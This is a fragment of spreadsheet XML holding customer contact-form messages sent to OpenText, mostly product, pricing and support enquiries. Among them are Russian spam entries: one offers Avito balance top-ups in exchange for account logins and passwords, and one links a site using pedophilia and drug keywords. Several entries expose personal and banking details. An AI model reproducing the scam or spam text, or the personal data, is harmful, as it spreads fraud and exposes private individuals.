    <t>We have some common customers that have RightFax installed and in the past we have been able to develop an integration between your product and ours.  Do you have pure development option for RightFax anymore?  We just need RightFax for the purpose of developing the integration to it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
I'm a systems integrator for the US Federal government, and we're in the market research phase for case management systems to meet a capability need. I'll like to go over these key capabilities with someone from your company when possible._x000D_
•	Workflow and Automation Capability_x000D_
•	Flexible Application Configuration/ build (Ex: Drag &amp; Drop)	_x000D_
•	APIs/ Ease of Integration	_x000D_
•	User Based Access Control	_x000D_
•	Collaboration Capability	_x000D_
•	Knowledge Management	_x000D_
•	Reporting and Visualization	_x000D_
•	Metrics Capture and Performance Analysis	_x000D_
•	Search and Discovery	_x000D_
•	Mobile accessibility_x000D_
•	Auto Alerts / Notifications	_x000D_
•	FedRAMP Certified Cloud capability	_x000D_
•	Private Gov Cloud capability	_x000D_
•	Asset Management	_x000D_
•	Primary Features_x000D_
</t>
  </si>
  <si>
    <t>Please send me your accounts receivable email address so I can forward you our ACH payment information.</t>
  </si>
  <si>
    <t>Hoping to learn more about you Digital Asset Management solutions. If it might (or might not) make sense for us as we're looking for such a solution. And specifically, would like to know about pricing, of course! Many thanks! Sheila</t>
  </si>
  <si>
    <t>Please send me the pdf referenced in note KB473555._x000D_
We have dead lock problem at our client BKV in productive system. Go-live was this week, users are upset with the short dump screens. _x000D_
Thank you</t>
  </si>
  <si>
    <t>J'ai lu dans la newsletter de supplychainmagazine.com que votre livre intitulé "Supply Chain Analytics For Dummies" était disponible sur votre site web. Je souhaiterais l'obtenir. D'avance merci</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I want participate in the Business Center training in Munich but your site shows it is in German. Can you also follow the training in English? </t>
  </si>
  <si>
    <t>VIM upgrade notes for GST</t>
  </si>
  <si>
    <t>Interested in becoming a reseller, once we have already several consultants working in projects, with skills in your products.</t>
  </si>
  <si>
    <t>Procuramos uma ferramenta para Gestão Eletrônica de Documentos, vocês trabalham com algum software neste campo?</t>
  </si>
  <si>
    <t>Jag var på kurs 5-7/12 och behöver komma i kontakt med kursledaren Melker. Vill ni skicka mig hans kontaktuppgifter?_x000D_
mvh_x000D_
Mikael Bondeson</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
We, Mercoline GmbH, are the EDI service provider for Wilhem Reuss GmbH._x000D_
_x000D_
Reuss is currently sending its invoices to the following X-400 address:_x000D_
_x000D_
C=GB  _x000D_
A=MARK400  _x000D_
S=X400SERVICE_x000D_
O=TRADANET_x000D_
_x000D_
The supplier number under which this relationship can be found is as follows:_x000D_
AAA082770033_x000D_
_x000D_
The GLN to which it is sent is the 5013546133243 which belonged to Tungsten at that time and is now assigned to OpenText|GXS._x000D_
_x000D_
As part of the conversion, it would be nice if someone contacted us to clarify the further details._x000D_
_x000D_
If this message does not reach the right place, I would ask you to inform me or forward it to someone who is responsible for it._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
Léon Krüger _x000D_
Mercoline GmbH , EDI , Senior Consultant_x000D_
Phone: +49 (0)30 4393 - 3033 Fax: +49 (0)30 4393 - 3737 _x000D_
Am Borsigturm 100 - D-13507 Berlin _x000D_
mailto:leon.krueger@mercoline.de - http://www.mercoline.de _x000D_
Geschäftsführer: Stephan Schultze _x000D_
Commerzbank AG - BLZ 100 400 00 - Konto 208 09 50 _x000D_
SWIFT COBADEFF - IBAN DE26 1004 0000 0208 0950 00 _x000D_
Sitz der Gesellschaft: Berlin _x000D_
Amtsgericht Charlottenburg - HRB 77642 _x000D_
USt-ID-Nr.: DE 813151 981 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>acquire info regarding our existing EasyLink account</t>
  </si>
  <si>
    <t>Looking for a demo license.</t>
  </si>
  <si>
    <t>I have a trial version of the Brava! Desktop IXL and when I try to go to the Model Space tab in certain AutoCAD drawings the program crashes.  It only happens with certain drawings, and only with the Model Space tab.  I have looked them over and compared them to the ones that work and I can't see any significant difference.</t>
  </si>
  <si>
    <t>Only want to pay minimum on my loan</t>
  </si>
  <si>
    <t>I would like to avail of Documentum for records management needs.</t>
  </si>
  <si>
    <t>Can't login or update PW. •	https://www.opentext.com/what-we-do/partners-and-alliances/partner-directory</t>
  </si>
  <si>
    <t>We're a small office in St. Louis, MO that is looking for a very affordable document management solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Want to renew maintenance on a Guidance software product directly with OpenText via the Master Agreement between WF and OTC.  The Guidance Product was previously purchased via a reseller (Optiv).  Please let me know what information you need from us to proceed with a Guidance EnCase renewal. .  </t>
  </si>
  <si>
    <t>I have an invoice to submit. POC is Peter Quigley, Engr, 216-214-5087. Need a link so I can complete submission. Thanks.</t>
  </si>
  <si>
    <t>We had messages to a mailing list bounce back due to "too many recipients". What is the limit to the number of recipients in a First Class mailing list?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our department is interested in training a group of our employees on the "Systems Fundamentals" course you offer, to raise their knowledge of GCDocs. Could you please provide us with the costs and availability (looking to do this before March) for the course? _x000D_
_x000D_
I have heard there is a group rate, where a 12 person course is charged as that of 6 people. If this is the case I think we could gather 12 people to attend. _x000D_
_x000D_
Please let me know the costs and availability you have (to do the course in Ottawa)._x000D_
_x000D_
Thank you!_x000D_
Pareesa Bina</t>
  </si>
  <si>
    <t>Would it be possible to re-set my community account password? Everytime I try to update it keep giving me an error message. _x000D_
_x000D_
Thanks,_x000D_
Jess</t>
  </si>
  <si>
    <t>We are looking to package the Hummingbird Exceed and Host Explorer to users so they can just click an exe file and it installed with no user interaction, we are wondering if this can be done per the license agreement and if you have tools to help the process</t>
  </si>
  <si>
    <t>Hi_x000D_
Need to get informations about the RightFax Express appliance working by SIP trunk: prices and where to order._x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like get the cost to purchase FirstClass email system</t>
  </si>
  <si>
    <t>I am interested in taking some courses you offer such as "Captiva Mobile Toolkit Fundamentals".  But your website wouldn't let me open the register page.  it gives me 403 - Forbidden: Access is denied...._x000D_
Please help ASAP.</t>
  </si>
  <si>
    <t>Looking for a distribution sku for licensing for print server product</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am studying OpenText Documentum solution (SaaS)._x000D_
I am trying to find technical and commercial information about Documentum solution on the cloud. I found few pdf on your site, but all tagged EMC and information might not be accurate. link found http://documentum.opentext.com/services/#Cloud_x000D_
_x000D_
Can you please provide me more information ?_x000D_
_x000D_
Regards,_x000D_
Olivier Spiesser</t>
  </si>
  <si>
    <t>We purchased a support contract and I need access to the support site.  I need the contract information so I can access the site.</t>
  </si>
  <si>
    <t>Enquiring on purchasing Metastorm Business Process Managment Engine processing only.</t>
  </si>
  <si>
    <t>I have some questions regarding creating and editing email templates and content. _x000D_
Regards_x000D_
Lo</t>
  </si>
  <si>
    <t>Enquiring about eDocs 5.3.1 add-in for Office 2016. Firstly, we are currently on version eDocs 5.3.1, on Windows 8 with Office 2013. However, we will shortly be upgrading to Windows 10 with Office 2016 and want to know if eDocs v5.3.1 is compatible and what we need to update. Thanks, Kate</t>
  </si>
  <si>
    <t>Olá, gostaria de conversar sobre a solução de OCR para documentos oferecida pela Opentext._x000D_
Tenho uma equipe desenvolvendo um sistema para um cliente da área logística e precisamos digitalizar, reconhecer via OCR e validar documentos como CNH, CPF, CRLV e outros da área logistica._x000D_
_x000D_
Gostaria de receber um contato da área de negócios de SP e agendar uma conversa sobre nossas necessidades de projeto._x000D_
_x000D_
Obrigado.</t>
  </si>
  <si>
    <t xml:space="preserve">[b]Пополение баланса Авито (Avito) за 50%[/b] | [b]Телеграмм @a1garant[/b] _x000D_
 _x000D_
[b]Здравствуйте, дорогие друзья![/b] _x000D_
 _x000D_
Рады предоставить Всем вам услуги по пополнению баланса на действующие активные аккаунты Avito (а также, совершенно новые). Если Вам необходимы определенные балансы - пишите, будем решать. Потратить можно  на турбо продажи, любые платные услуги Авито (Avito). _x000D_
 _x000D_
[b]Аккаунты не Брут. Живут долго.[/b] _x000D_
 _x000D_
Процент пополнения в нашу сторону и стоимость готовых аккаунтов: [b]50% от баланса на аккаунте.[/b] _x000D_
Если требуется залив на ваш аккаунт, в этом случае требуются логин и пароль Вашего акка для доступа к форме оплаты, пополнения баланса. _x000D_
Для постоянных клиентов гибкая система бонусов и скидок! _x000D_
 _x000D_
[b]Гарантия: [/b] _x000D_
 _x000D_
[b]И, конечно же ничто не укрепляет доверие, как - Постоплата!!![/b] Вперед денег не просим... _x000D_
 _x000D_
Рады сотрудничеству! _x000D_
 _x000D_
[b]Заливы на балансы Авито[/b] _x000D_
________ _x000D_
 _x000D_
не могу подать объявление на авито пишет номер не подтвержден в аккаунте_x000D_
аккаунт avito с балансом_x000D_
авито регер аккаунтов_x000D_
как создать авито кошелек_x000D_
авито аккаунты с магазином купить_x000D_
</t>
  </si>
  <si>
    <t>Dear opentext,_x000D_
I went to use your birt ihub for our interactive reporting but I don't have ihub installation file. Please give me your installation file for trial purpose and also your license price details._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Can you please tell me if there is any documentation on the Teleform 11 Scripting API Library COM object, as I am unable to find any on the web.  If there is, please could I get a copy?_x000D_
_x000D_
Kind Regards,_x000D_
Mike T</t>
  </si>
  <si>
    <t>We are using brava viewer to do comments on the documents. While saving the file into PDF , we could not able to extract comments from pdf  to Excel as those comments are coming as Images. How do we export the comments from PDF to Excel?</t>
  </si>
  <si>
    <t>To enhance technical skills</t>
  </si>
  <si>
    <t>Jag gör för kunds räkning en undersökning kring möjliga lösningar för dokument- och ärendehantering. I synnerhet produkter lämpliga för att ersätta gemensamma diskar med mappstrukturer. Har ni några referenskunder i Sverige som gjort just detta._x000D_
_x000D_
Mvh_x000D_
Peter Falk</t>
  </si>
  <si>
    <t>Would like to know how the Original BASISPlus is known as Today in OpenText and how it has transformed. What solutions does it offer today ?</t>
  </si>
  <si>
    <t>Kindly provide Opentext access</t>
  </si>
  <si>
    <t>I have a question about Brava Desktop DXP and/or the Free Brava DWG Viewer._x000D_
_x000D_
Currently we heavily use the Free DWG Viewer. The functionality that is very important to is is the fact that it can show DWG's inside Internet Explorer extremely fast, ie. no loading screens. _x000D_
_x000D_
I am aware that the free version will be discontinued. But as a result to that i have some questions:_x000D_
_x000D_
- What does the Brava Desktop DXP software offer MORE than the Free DWG Viewer currently does? Ie. what is the added value, how do you justify the price?_x000D_
_x000D_
- Is the network license floating? Meaning that 10 network licenses means 10 concurrent users._x000D_
_x000D_
- Does the Brava Desktop DXP viewer allow installation via Group Policy (Active Directory) installation?_x000D_
_x000D_
- Does Brava Desktop DXP allow central/managed configuration (of the license server) via Group Policy (GPO)_x000D_
_x000D_
Regards, Mathijs</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at purchasing a Data Exploration  / Analytic tool that we can run on top of SAP BW. We have a strong requirement to increase our data analytic capability. _x000D_
_x000D_
OpenText product looks good. Need to understrand:_x000D_
- Architecture - do you have a cloud version? SaaS? _x000D_
- How would you deploy on top of SAP BW - our data repository?_x000D_
- When can you come into our office at 175 Liverpool Street (Level 29) for a conversation and basic product demonstration? _x000D_
_x000D_
We want to move fast. Please respond as quickly as you can. _x000D_
 </t>
  </si>
  <si>
    <t>difficulty gaining access to ocean - connect</t>
  </si>
  <si>
    <t>We would like to get a proposal for (implementation and Licensing) of OpenText ECM</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
My name is Dan Chabert, and I contacted you previously to see if you are willing to sell a link or accept sponsored post on your site._x000D_
_x000D_
Please tell me if you are willing to work something out._x000D_
_x000D_
Thanks,_x000D_
Dan Chabert</t>
  </si>
  <si>
    <t>I have been trying to reach out to Saood Javed, who recently dealt with a colleague of mine for the following request:_x000D_
_x000D_
I believe you had been working with my college Helen To on an estimation for OpenText – Content Suite and Documentation. I am no looking to expand on her research for the purposes of the HR and Finance functions here in UBC._x000D_
_x000D_
I am happy with everything Helen has already provided me with, however I just wanted to touch base on three more things:_x000D_
_x000D_
1.	Does your system  have the ability to support Optical Character Recognition (OCR)_x000D_
2.	What is the maximum size document that can be uploaded?_x000D_
3.	In the case of HR, where employees might upload documents for the HR file, are they classed as users? _x000D_
_x000D_
I look forward to hearing from you, _x000D_
Regards, _x000D_
Carolyn</t>
  </si>
  <si>
    <t>We are interested in procuring an ERM system focusing on our engineering and infrastrcture records. Our biggest issues are a). lack of records management policy or retention schedule b). inabaility to find records (not surprising based on issue a) c). needing to search across multiple repositories d). needing to house permanent records in an archival repository. _x000D_
I'd like to hear more about what OpenText can offer. _x000D_
_x000D_
Thank you!_x000D_
Kelly</t>
  </si>
  <si>
    <t>Can you let me know pricing and how to start service</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to search on Content Server 16.3 Scan documents - Enterprise Scan </t>
  </si>
  <si>
    <t>We attempted to send a request to the following email address, 'translationservices@opentext.com', but we received a "failure to deliver" response, could you please help?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, how do I archive old faxes in Rightfax 10.60 FP3 SR2 and moved it off the production server? Do I need the OpenText Rightfax Vault?_x000D_
_x000D_
Thank you._x000D_
Chris_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I was told that your company might have software that we are looking for.  We are looking for software that can take a file (xml, csv, edi) etc and create a map, mapping to our developed XML.  As a file would come into a defined folder, the map would run according to the file mask that it was using, outputting the new XML document, and moving it to a new location. Is this something that any of your software packages have? _x000D_
_x000D_
Shannon</t>
  </si>
  <si>
    <t xml:space="preserve">Our office is interested in the "fax2mail" service that I believe is powered by Easylink Services._x000D_
Can you provide me with costs in the US?  Thank you,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Assistance transferring database to reddot system(now managed through opentext webiste manager ). Is it possible ? </t>
  </si>
  <si>
    <t>We are owners of an old OpenText A104 analog fax appliance and looking to possibly upgrade to either the RightFax Express appliance or RightFax Express virtual machine. I need to get in contact with someone for pricing info and technical questions. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, If possible I would like a representative from Government Sales to contact me.  I believe the agency has perpetual licenses (Exceed on Demand), which have we  have renewed our maintenance this past summer through a reseller.   I want to confirm the true Period of Performance.  I have VPS number / User SENC number and quantity  number.   At your earliest convenience could a representative please contact me either via email or phone call for the details.     Thanks.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope all is well. I’m reaching out to see if you would be interested in partnering for our B2B online event in 2018. The event will be taking place from May 07-May 09, 2018 in the Chicago Marriott Downtown. B2B Online brings together manufacturers and distributors to connect and discuss detailed tactics for innovating B2B eCommerce and digital marketing. https://b2bmarketing.wbresearch.com/_x000D_
_x000D_
Let me know if you would be interested in putting together a non monetary agreement._x000D_
_x000D_
I look forward to hearing back!_x000D_
_x000D_
Best,_x000D_
Aaron</t>
  </si>
  <si>
    <t xml:space="preserve">How can I contact Registrar of Shareblocks to freeze Bank account for a while? </t>
  </si>
  <si>
    <t>Investigating RightFax Express 2 line analog option.</t>
  </si>
  <si>
    <t>We are updating our records and need a current W9 for Easylink Services International Corp.  Can you please email one over?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"># 17120612AG_x000D_
_x000D_
Kindly quote your best discounted prices and the availability for the following products for resale (US Federal Government) as soon as possible.  _x000D_
_x000D_
Open Text Inc., 951 Mariners Island Blvd. San Mateo, CA 94404 for the following products and service:_x000D_
_x000D_
-Open Text Brava Licenses_x000D_
250 Each _x000D_
_x000D_
Regards_x000D_
_x000D_
M.K. Bhayana_x000D_
Bhayana Brothers LLC_x000D_
65 W. Manilla Avenue_x000D_
Pittsburgh PA 15220 USA_x000D_
Phone: 412-921-7424_x000D_
Fax:        412-921-7425_x000D_
E-Mail: sales@bhayanabrothers.com_x000D_
Web Site: www.bhayanabrothers.com_x000D_
</t>
  </si>
  <si>
    <t>I want to be an Opentext partner in my region.</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
Steelcase is interested in evaluating your DAM product. Is there a sales representative in my area that can contact me?_x000D_
Thanks,_x000D_
Leah Wareck</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am on the same project that Julien Lesage (julien.lesage@cagemini.com). _x000D_
Can you give me the same access that Julien has, please ?_x000D_
_x000D_
Cordially,_x000D_
Makan Simpara</t>
  </si>
  <si>
    <t>I would like pricing information of Brava! I am looking to upgrade our small enterprise from  an early version of Myriad to your current software.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I wonder if you could help me to route this invitation to the most appropriate person inside Open Text in the Reading UK office. In our experience this person is likely to be in HR, corporate and social responsibility (CSR) or legal functions. It is an invitation to the launch of Ethical Reading (as in the town of Reading)._x000D_
_x000D_
As a prominent business in the Reading Area, we would like to invite a representative from OpenjText to our launch of Ethical Reading on January 24th at Thames Tower, Reading at 8.00-10.00am. This is a new social enterprise recently set up to support organisations in and around Reading._x000D_
_x000D_
Background_x000D_
At Ethical Reading, we have a vision that society can be positively transformed by organisations with deeply rooted ethical behaviour, who are strongly engaged with the community and who act in an environmentally sustainable way. We believe that, as a community of organisations working together, we will be able to transform the working lives of people in Reading and make it a very special place where we treat each other with respect and compassion._x000D_
 _x000D_
Out of this vision, Ethical Reading was born, and it is being formally launched at a breakfast event at Thames Tower, Reading on Wednesday 24 January at 8.00am.  It is being supported by Grant Thornton, Shoosmiths, Reading UK, the Business Ethics Alliance and key people in the Reading locality – the leaders of industry, organisations, local government and charities – are all being invited. We are expecting over 100 business leaders at the launch._x000D_
 _x000D_
What you will learn_x000D_
In a transparent world with the spotlight of social media, doing business ethically is no longer a luxury but a necessity. The launch will provide lots of opportunity to learn, connect and collaborate – with a mixture of presentations, group exercises and a panel session covering real world ethical issues in the workplace. _x000D_
_x000D_
Contributions will be made by _x000D_
 _x000D_
•	Professor Beverly Kracher - CEO Business Ethics Alliance, O</t>
  </si>
  <si>
    <t>Need to get pricing information for Brava enterprise for IBM Tririga</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
wir möchten für die GDPR / EU-DSGVO gerüstet sein und daher wissen, inwiefern dies für unsere etwas ältere Archivserver-Version 9.7.1 zutrifft oder ob ggf. (schon aus diesem Grund) ein Upgrade auf die aktuelle Version 16 (?) erforderlich ist. Aus den allgemeinen OpenText-Unterlagen zum Thema habe ich dies bisher leider nicht herauslesen können und auch im CSS nichts gefunden. (Aus meiner Sicht dürften in einem reinen Archivsystem eigentlich nicht allzu viele Benutzer-Daten vorhanden sein.)_x000D_
Können Sie mir hierzu bitte Informationen zusenden bzw. mich einmal anrufen (mo.-do.)?_x000D_
Beste Grüße_x000D_
Erich Dickhage</t>
  </si>
  <si>
    <t>Bom dia!_x000D_
_x000D_
Represento a empresa Sciensa e temos projetos de software para clientes com necessidade de digitalização de documentos e reconhecimento de textos e campos, para integração com sistemas externos, onde os campos serão tratados em seus respectivos processos de negócio._x000D_
_x000D_
No aguardo._x000D_
_x000D_
Obrigado,_x000D_
_x000D_
Roberto Rubinick Junior</t>
  </si>
  <si>
    <t>OTMM 16.2  License/Pricing</t>
  </si>
  <si>
    <t>Frustration with lack of support and assistance received regarding problems with the EDI information being sent to one of our customers we have been with opentext for many years (formally Freeway) but we are now considering going elsewhere if the problem isn't solve soon</t>
  </si>
  <si>
    <t>Have completed registration on Open Text site but do not have access to MySupport. Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are currently using Exceed v14.0.5.555 in Kinsale. I am involved in the site project to move to Windows 10/ Windows Server 2016. I have a number of questions on the Exceed Software_x000D_
_x000D_
1. Will Exceed 14 Work with Windows 10 ?_x000D_
2. Will the software Work with Windows 2016/Citrix Storefront ?_x000D_
3. What are my options for Upgrading - Exceed upgrade, Turbo X, Exceed on Demand etc._x000D_
_x000D_
Philip </t>
  </si>
  <si>
    <t>Need to get a number for our office in Fredricksburg, Virginia. We do not have a number to port. We'll need a new number._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Looking for opened tenders around witbank for supplying machines and construction</t>
  </si>
  <si>
    <t>Changed email address from rcross@rooff.co.uk to it@rooff.co.uk and can no longer log in. I need to download latest version</t>
  </si>
  <si>
    <t>We are looking/analyzing the Open Text's ProVision tool to use it in some of our engagements. But i could not find much available material to understand the tool or some demo for the same. If you have some supporting documents that can help us understand this tool better, please send the same to the above mentioned email. Thanks and Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">I am the new Supplier Relationship Manager within Intrinsic and need to acquire the details of Intrinsic's account manager within EasyLink/Open Text to look at implementing Governance and Oversight meetings in line with FCa regulations into the 2018 calendar._x000D_
_x000D_
Can you please provide me with these details ASAP _x000D_
_x000D_
Many thanks_x000D_
_x000D_
Emma-Grace Brien_x000D_
Telephone: 07342949687 </t>
  </si>
  <si>
    <t xml:space="preserve">I am not able to access the knowledge center .After login I am redirected to some page in that I was given some link like registration confirm. Please get back my access. </t>
  </si>
  <si>
    <t>my account is not working correctly on login. I have had my account since 2014 , its asking to confirm registration when accessing software downloads._x000D_
regards,_x000D_
Mythili Sivasankar</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
It's Ganchimeg from Mongolia. Our company is looking for Digital Asset Management system to utilize up coming year. We want to track every digital assets who uses where used including both external and internal users. I guess your system will perfect fit to our needs. But we want to try demo and also we want to get how much would it be costed. Looking forward to your reply. _x000D_
_x000D_
with best regards,_x000D_
Ganchimeg Enebish</t>
  </si>
  <si>
    <t>Hello, _x000D_
Our customer, Tallinn University of Technology, would like to purchase "OpenText Exceed &amp; Exceed 3D "Academic(EDU) licenses, qty:10_x000D_
Please send a quote in two parts:_x000D_
1) Licenses only_x000D_
2)Licenses  with Maintenance 12 Months_x000D_
_x000D_
As Atea act as reseller._x000D_
_x000D_
Thank you!_x000D_
Kind regards, _x000D_
AS Atea</t>
  </si>
  <si>
    <t>Wanted to see the possibilities of a domain</t>
  </si>
  <si>
    <t>Using Integrator 5. Interested on acquiring Target ASN template (EDIFACT) format. Please email quote and details to rodel.gaerlan@au.yusen-logistics.com._x000D_
Thanks.</t>
  </si>
  <si>
    <t>dear support, _x000D_
_x000D_
how can i download CSIDE?_x000D_
_x000D_
thanks!</t>
  </si>
  <si>
    <t>Dear Hi,_x000D_
I went download and install BIRT iHub to use BIRT report designer. Please help me to download and install Birt ihub._x000D_
_x000D_
Best Regards,_x000D_
Emam Hasan</t>
  </si>
  <si>
    <t>We're considering moving form Cygwin to Exceed. I'd like to understand the license before making the investment.</t>
  </si>
  <si>
    <t>What Xerox Multifunction Devices are supported by Captiva?   Also, does Captiva work with Smartcard authentication like CAC/PIV?</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
We have recently attempted to pay invoice 9000207154 from your company, however the payment has bounced back. Can you please provide written confirmation of the best account to pay OpenText Pty Ltd within Australia._x000D_
_x000D_
Thanks heaps,_x000D_
_x000D_
Kim Sturge_x000D_
Accounts Payable_x000D_
Datacom Systems (AU) Pty Ltd - QLD Division.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a big national egovernment project and we would like to see how Open Text can be used and if you have samples of how Open Text can be applied. </t>
  </si>
  <si>
    <t>we purchase one teamcenter software from your company, now we need your business License ,Legal person passport or ID card (scanning copy) but no people response me so far</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My name is Svitlana Zholtova and I am asking about several minutes of your time. This is a letter of asking for help, so if you are too busy or do not want to read it – sorry for disturbing you._x000D_
I have a godson Danylo Struk. He will be 2 years old on the  5th  of January. He was born almost deaf (Sensoryural deafness of the 4th stage). He is wearing aerophones now but they are no use. He doesn’t hear properly. He won’t hear “mummy” – just “mmma” He won’t hear a sound from behind, he doesn’t know how birds sing or the Sea rustles. He doesn’t hear anything from a distance of 1 meter in front of him. I understand that it is not a matter of life and death – there are children, who need operations just to live. But Danylo is a wonderful child – cheerful and clever. His parents, Ludmyla and Taras, do anything they can to gather money for special implants. These implants will allow Danylo live like common child - grow, develop, communicate, learn, work. They have a real possibility to do the operation this February, but they need 40000 hryvnas (about 1300 dollars) more. This is a really huge sum for us. _x000D_
But every dollar brings this chance closer. So, I beg you, if you be so kind and send how many you can to help them._x000D_
I will send you documents that confirms Danylo’s diagnosis if necessary. _x000D_
5168 7555 3219 9680 is the number of father’s PrivatBank card._x000D_
https://www.facebook.com/ostapchuk.liudmila - is mother’s page on Facebook._x000D_
Thanks a lot._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, just wanted to see what pricing and packages you offer? Thank you_x000D_
</t>
  </si>
  <si>
    <t>I wish to find the System Requirements for Opentext.</t>
  </si>
  <si>
    <t>We would like to download Open Text Exceed for WINDOWS 10. Please let us know how to download it ._x000D_
Regards,_x000D_
Julio Cabellos_x000D_
416.344.2742</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me a remittance address for payments. The last payments I have made were returned.  _x000D_
Thank you </t>
  </si>
  <si>
    <t>Access to Support</t>
  </si>
  <si>
    <t>Hello, I am writing to follow up on the Center for Excellence in Education proposal for funding submitted on July 14, 2017. As a reminder:  The Center requests OpenText support  the Teacher Enrichment Program with a $15,000 gift to the professional development of urban and rural middle and high school science teachers to impact students in schools in multiple OpenText locations: Los Angeles, San Diego, and San Francisco, California; Austin, Dallas, and San Antonio, Texas; and Arlington, Virginia. _x000D_
_x000D_
The funds will defray the costs of delivering TEP’s in-person sessions to teachers and delivering TEP’s online content, including downloadable materials and resources, for teachers to share in the classroom and allow CEE to expand its programs._x000D_
_x000D_
I am available at your convenience to provide additional information and to answer questions._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Charles Farmer</t>
  </si>
  <si>
    <t>We are looking to process hundreds of pdf files for redaction through our application work flow. We need API/SDK(.dll) which supports .net 4.5 and above to integrate with our application. I just wanted to know do you have .dll instead .exe.  If yes, could you provide api/sdk with temporary license version and sample code to consume the .dll methods to redact sensitive information in PDF.</t>
  </si>
  <si>
    <t>Looking for call recording with the ability to stop/start based on API control for 1000 agents.</t>
  </si>
  <si>
    <t>Hello OpenText Security Team,_x000D_
_x000D_
No captcha was used in the communication section of the page._x000D_
_x000D_
Risk factors that may occur:_x000D_
_x000D_
Thousands or millions of emails can be sent. Negative for people trying to communicate. It will also adversely affect the customer in terms of loss or satisfaction._x000D_
_x000D_
OWASP web security community recommends using captcha on form pages._x000D_
_x000D_
Url address : https://www.opentext.com/who-we-are/contact-us/contact-opentext_x000D_
_x000D_
Good works :)</t>
  </si>
  <si>
    <t>Interest in Exstream</t>
  </si>
  <si>
    <t>Hi, we are looking into developing a solution for our eDockets product to work with eDocks, and need to figure out the best way to acquire some sort of license to install eDocks server in our environment for development purposes.</t>
  </si>
  <si>
    <t>Need support for a user who is unfamiliar with new functionality in exceed 15</t>
  </si>
  <si>
    <t>We would like to propose OpenText Document Management System for a Tender opportunity in India. Request you to kinldy provide your specifications and pricing for the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Adam,_x000D_
_x000D_
 My name is Brianna and I am the Client Engagement Manager at GLOSSY. My team and I are super impressed at the wholistic information management solutions OpenText provides to Retail and Fashion companies around the world. With our audience of executives across luxury beauty, and fashion brands we believe we are perfect to help propel your company's goals, especially in this luxury space. _x000D_
_x000D_
_x000D_
We're particularly interested in your partnership for our GLOSSY Summit event in Miami this year titled "The Amazon Effect". Now more than ever, retailers and brands are seeking effective solutions to help keep them competitive . At GLOSSY Events, we can guarantee an audience and direct leads with top-decision makers across luxury, fashion &amp; beauty brands and retailers. _x000D_
_x000D_
We also have events in Europe, as I know that's where you are headquartered. We can discuss these opportunities as well. _x000D_
_x000D_
I would love to hop on a call this week to talk more details. Does anytime Thursday work for you? _x000D_
</t>
  </si>
  <si>
    <t>Need a point of contact for our Government customer to reach out to for support purchased. Customer is DMDC out of Seaside, CA. They just renewed support in Sept. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Групловое порно _x000D_
&lt;a href=http://www.drdoors-msc.ru&gt;эротика&lt;/a&gt;_x000D_
&lt;a href=http://www.drdoors-msc.ru&gt;педики&lt;/a&gt;_x000D_
&lt;a href=http://www.drdoors-msc.ru&gt;травка&lt;/a&gt;_x000D_
&lt;a href=http://www.drdoors-msc.ru&gt;героин&lt;/a&gt;_x000D_
&lt;a href=http://www.drdoors-msc.ru&gt;конопля&lt;/a&gt;_x000D_
 _x000D_
[url=http://www.drdoors-msc.ru]педофилия[/url]_x000D_
[url=http://www.drdoors-msc.ru]трансы порно[/url]_x000D_
[url=http://www.drdoors-msc.ru]гомосек[/url]_x000D_
[url=http://www.drdoors-msc.ru]негры[/url]_x000D_
[url=http://www.drdoors-msc.ru]трахнуть негра[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are currently running a very old version of MessageManager FSDI- I'm unsure of the version number but our serial number is 501121 if that helps. Are will shortly be migrating our on-premise Exchange servers to Office365, and understand that our current MessageManager will most probably be incompatible. Could you please advise what path we can take to upgrade to a version which can function with 365? We'd still require to route fax calls from our on-premise telephone system to the new solution, which would then deliver faxes to a 365 mailbox. Thank you</t>
  </si>
  <si>
    <t>I would like to request full access to MySupport and have my account linked to the siteid of Nykredit A/S (siteid=4257642)_x000D_
_x000D_
Best regards_x000D_
Jens Viggo Drejer</t>
  </si>
  <si>
    <t>I can not acces to the Knowledge Center or my Support but my partners do._x000D_
_x000D_
What I have to do?</t>
  </si>
  <si>
    <t>Require some details on Open Text Product IGC Brava webtop client 7.2</t>
  </si>
  <si>
    <t>Edit date on document version is not correct.</t>
  </si>
  <si>
    <t>Need an archiving system to manage documents</t>
  </si>
  <si>
